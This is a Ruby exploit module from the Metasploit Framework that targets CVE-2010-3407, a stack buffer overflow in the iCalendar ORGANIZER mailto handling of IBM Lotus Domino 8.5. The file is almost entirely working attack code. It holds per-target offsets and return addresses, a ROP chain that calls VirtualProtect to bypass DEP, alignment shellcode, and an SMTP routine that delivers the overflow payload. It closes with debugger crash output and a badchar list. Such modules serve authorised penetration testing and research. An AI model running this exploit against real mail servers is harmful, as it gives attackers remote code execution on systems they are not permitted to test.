rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/lotus/domino_icalendar_organizer.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

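class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Banner fragment that identifies the affected Domino release. Shared by
  # check and exploit so both apply the same match (the original exploit
  # path used an unescaped dot, so "8x5" would also have matched).
  DOMINO_BANNER = /Lotus Domino Release 8\.5/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "IBM Lotus Domino iCalendar MAILTO Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By
          sending a long string of data as the "ORGANIZER;mailto" header, process "nRouter.exe"
          crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to
          gain arbitrary code execution.

          Note: In order to trigger the vulnerable code path, a valid Domino mailbox account
          is needed.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'A. Plaskett', # Initial discovery, poc
          'sinn3r' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2010-3407' ],
          [ 'OSVDB', '68040' ],
          [ 'ZDI', '10-177' ],
          [ 'URL', 'http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ]
        ],
        'Payload' => {
          'BadChars' => [*(0x00..0x08)].pack("C*") + [*(0x10..0x18)].pack("C*") + [*(0x1a..0x1f)].pack("C*") + "\x2c" + [*(0x80..0xff)].pack("C*"),
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' => { 'BufferRegister' => 'ECX' },
          'StackAdjustment' => -3500
        },
        'DefaultOptions' => {
          'EXITFUNC' => "process"
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Lotus Domino 8.5 on Windows 2000 SP4',
            {
              'Offset' => 2374, # Offset to EIP
              'Ret' => 0x6030582B, # JMP ECX
              'MaxBuffer' => 9010 # Total buffer size
            }
          ],
          [
            'Lotus Domino 8.5 on Windows Server 2003 SP0',
            {
              'Offset' => 2374, # Offset to EIP
              'Ret' => 0x6030582B, # JMP ECX (Domino\\nnotes.dll)
              'MaxBuffer' => 9010 # Total buffer size
            }
          ],
          [
            'Lotus Domino 8.5 on Windows Server 2003 SP2',
            {
              'Offset' => 2374, # Offset to EIP
              'Ret' => 0x604C4222, # ADD AL,0x5E ; RETN
              'EAX' => 0x7C35287F, # Initial CALL VirtualProtect addr to align (MSVCR71.dll)
              'EaxOffset' => 2342, # Offset to EAX
              'RopOffset' => 24, # Offset to ROP gadgets
              'MaxBuffer' => 9010 # Total buffer size
            }
          ],
        ],
        'DisclosureDate' => '2010-09-14',
        'DefaultTarget' => 2,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(25),
        OptString.new('MAILFROM', [true, 'Valid Lotus Domino mailbox account', '']),
        OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', ''])
      ]
    )
  end

  # Reads the SMTP greeting and reports Appears when it names Domino 8.5.
  # The connection is released even if the banner read raises.
  #
  # @return [Exploit::CheckCode] Appears or Safe
  def check
    connect
    begin
      banner = (sock.get_once(-1, 5) || '').chomp
    ensure
      disconnect
    end

    return Exploit::CheckCode::Appears if banner.match?(DOMINO_BANNER)

    Exploit::CheckCode::Safe
  end

  # Builds the overflow string, wraps it in the iCalendar message and drives
  # the SMTP session that delivers it. Stops early (after a disconnect) when
  # the greeting does not look like Domino 8.5.
  def exploit
    sploit = build_overflow_buffer
    body = build_icalendar_body(sploit)

    print_status("Trying target #{target.name}")

    connect

    # Get SMTP Banner
    banner = (sock.get_once || '').chomp
    print_status("Banner: #{banner}")

    # Check banner before trying the exploit
    unless banner.match?(DOMINO_BANNER)
      print_error("Remote service does not seem to be Lotus Domino 8.5")
      disconnect
      return
    end

    smtp_exchange("HELO localhost\r\n")
    smtp_exchange("MAIL FROM: <#{datastore['MAILFROM']}>\r\n")
    smtp_exchange("RCPT TO: <#{datastore['MAILTO']}>\r\n")
    smtp_exchange("DATA\r\n")

    # Send malicious data; whatever the server answers here is not logged
    sock.put(body)
    sock.get_once

    smtp_exchange("QUIT\r\n")

    handler
    disconnect
  end

  private

  # Selects the buffer layout for the current target by name.
  #
  # @return [String] the raw overflow buffer
  def build_overflow_buffer
    case target.name
    when /Windows 2000 SP4/
      plain_overflow(934)
    when /Server 2003 SP0/
      plain_overflow(930)
    when /Server 2003 SP2/
      rop_overflow
    else
      # Unreachable with the target table above; kept explicit so a future
      # target entry without a layout fails loudly instead of sending ''.
      fail_with(Failure::NoTarget, "No buffer layout for target '#{target.name}'")
    end
  end

  # Layout for the two targets whose return address is a JMP ECX:
  # [lead_pad][payload][filler to Offset][ret][filler to MaxBuffer].
  #
  # @param lead_pad [Integer] number of filler bytes placed before the payload
  # @return [String]
  def plain_overflow(lead_pad)
    buf = ''
    buf << rand_text_alpha(lead_pad)
    buf << payload.encoded
    buf << rand_text_alpha(target['Offset'] - buf.length)
    buf << [target.ret].pack('V')
    buf << rand_text_alpha(target['MaxBuffer'] - buf.length)
    buf
  end

  # Layout for the Windows Server 2003 SP2 target. Borrows a
  # "CALL VirtualProtect()" in Domino's MSVCR71.dll to bypass DEP.
  # shellcode max = 1312 bytes
  #
  # @return [String]
  def rop_overflow
    rop_gadgets =
      [
        # EAX should be aligned to CALL VirtualProtect at this point
        0x604F5728, # MOV DWORD PTR DS:[ECX],EAX; RETN (nnotes.dll)
        # Set shellcode address
        0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
        0x62454F32, # ADD AL,2B; RETN (nlsccstr.dll)
        0x603F7B38, # ADD AL,31; RETN (nnotes.dll)
        0x624B7040, # MOV DWORD PTR DS:[ECX+4],EAX; RETN (nnotes.dll)
        # Set RETN value
        0x60577B7A, # XCHG EAX,EDX; RETN (nnotes.dll)
        0x62452E35, # MOV EAX,ECX; RETN (nlsccstr.dll)
        0x60606F4E, # ADD AL,5D; RETN (nlsccstr.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x7C3A4C72, # MOV DWORD PTR DS:[EAX],EDX; RETN (msvcp71.dll)
        0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
        0x60253B6D, # XCHG EAX,EBP; RETN (nnotes.dll)
        # Set Size (0x413)
        0x605A4B30, # MOV EAX,205; RETN (nnotes.dll)
        0x605A4B30, # MOV EAX,205; RETN (nnotes.dll)
        0x60592A36, # ADD EAX,107; RETN (nnotes.dll)
        0x603B4C27, # ADD AL,2B; RETN (nnotes.dll)
        0x624B7044, # MOV DWORD PTR DS:[ECX+8],EAX; RETN
        0x604C5225, # XOR EAX, EAX; RETN
        # newProtect
        0x60386C3C, # MOV AL,3B; RETN (nnotes.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624B7048, # MOV DWORD PTR DS:[ECX+C],EAX; RETN
        # oldProtect
        0x602B7353, # MOV EAX,ESI; POP ESI; RETN (nnotes.dll)
        0x41414141, # ESI
        0x624B704C, # MOV DWORD PTR DS:[ECX+10],EAX; RETN (nlsccstr.dll)
        # Call VirtualProtect
        0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
        0x60276256, # XCHG EAX,ESP; RETN (nnotes.dll)
      ].pack("V*")

    # PUSH ECX; POP EAX; XOR AL,43; INC EAX; XOR AL,65; PUSH EAX; POP ECX
    align = "\x51\x58\x34\x43\x40\x34\x65\x50\x59"

    buf = ''
    buf << rand_text_alpha(1022)
    buf << align
    buf << payload.encoded
    buf << rand_text_alpha(target['EaxOffset'] - buf.length)
    buf << [target['EAX']].pack('V')
    buf << rand_text_alpha(target['Offset'] - buf.length)
    buf << [target.ret].pack('V')
    buf << rand_text_alpha(target['RopOffset'])
    buf << rop_gadgets
    buf << rand_text_alpha(target['MaxBuffer'] - buf.length)
    buf
  end

  # Wraps the overflow buffer in the iCalendar COUNTER message; the long value
  # travels in the ORGANIZER mailto address.
  #
  # @param sploit [String] buffer from build_overflow_buffer
  # @return [String] SMTP DATA content, CRLF-terminated and closed with the "." line
  def build_icalendar_body(sploit)
    fname = rand_text_alpha(4)
    prod_id = "#{rand_text_alpha_upper(5)}@#{rand_text_alpha_upper(13)}@#{rand_text_alpha_upper(24)}"
    uid = rand_text_alpha_upper(15)
    summary = "#{rand_text_alpha_upper(5)}@#{rand_text_alpha_upper(11)}"
    status = rand_text_alpha_upper(4)

    lines = [
      "Content-Type: text/calendar; method=COUNTER; charset=UTF-8",
      "#{fname}.txt",
      "MIME-Version: 1.0",
      "Content-Transfer-Encoding: 8bit",
      "BEGIN:VCALENDAR",
      "METHOD:COUNTER",
      "PRODID:-//#{prod_id}//",
      "VERSION:2.0",
      "BEGIN:VEVENT",
      "UID:#{uid}",
      "SEQ:2",
      "RRULE:aaaa",
      "ORGANIZER:mailto:H@#{sploit}.com",
      "ATTENDEE;:Mailto:#{datastore['MAILTO']}",
      "SUMMARY:#{summary}",
      "DTSTART:20091130T093000Z",
      "DTEND:20091130T093000Z",
      "DTSTAMP:20091130T083147Z",
      "LOCATION:Location",
      "STATUS:#{status}",
      "END:VEVENT",
      "END:VCALENDAR",
      "",
      "."
    ]
    # Every line, including the final ".", is CRLF-terminated.
    lines.join("\r\n") + "\r\n"
  end

  # Sends one SMTP command line and logs the server's reply.
  #
  # @param cmd [String] complete command including the trailing CRLF
  def smtp_exchange(cmd)
    sock.put(cmd)
    res = sock.get_once || ''
    print_status("Received: #{res.chomp}")
  end
end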

=begin
0:008> r
eax=41414141 ebx=00000004 ecx=08da9700 edx=08dab695 esi=06c248bc edi=00000014
eip=42424242 esp=08da9cc0 ebp=41414141 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
42424242 ?? ???
0:008> !exchain
08daea2c: nRouter+511bb (004511bb)
08daffdc: kernel32!_except_handler3+0 (77e70abc)
CRT scope 0, filter: kernel32!BaseThreadStart+3a (77e4a92d)
func: kernel32!BaseThreadStart+4b (77e4a943)
Invalid exception stack at ffffffff
0:008> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
08da9cbc 43434343 0x42424242
08da9cc0 43434343 0x43434343
...
0:008> bl
0 e 602738f9 0001 (0001) 0:**** nnotes!MailCheck821Address+0xb09
0:008> u 602738f9
nnotes!MailCheck821Address+0xb09:
602738f9 e80239d9ff call nnotes!Cstrcpy (60007200)
602738fe eb02 jmp nnotes!MailCheck821Address+0xb12 (60273902)
60273900 33ff xor edi,edi
60273902 8d8dc0faffff lea ecx,[ebp-540h]
60273908 51 push ecx
60273909 8d95bcf6ffff lea edx,[ebp-944h]
6027390f 52 push edx
60273910 e8eb38d9ff call nnotes!Cstrcpy (60007200)

Badchars:
0x01=0x0F21, 0x02=0x0f22, 0x03=0x0f23, 0x04=0x0f24, 0x05=0x0f25, 0x06=0x0f26, 0x07=0x0f27
0x08=0x0f28, 0x0a=nocrash, 0x0b=0x0f2b, 0x0c=0x0f2c, 0x0d=nocrash, 0x0e=0x0f2e, 0x0f=0x0f2f,
0x10=0x0f30, 0x11=0x0f31, 0x12=0x0f32, 0x13=0x0f33, 0x14=0x0f34, 0x15=0x0f35, 0x16=0x0f36,
0x17=0x0f37, 0x18=0x0f38, 0x1a=0x0f3a, 0x1b=0x0f3b, 0x1c=0x0f3c, 0x1d=0x0f3d, 0x1e=0x0f3e,
0x1f=0x0f3f, 0x2c=nocrash, 0x80..0xff = ""
=end
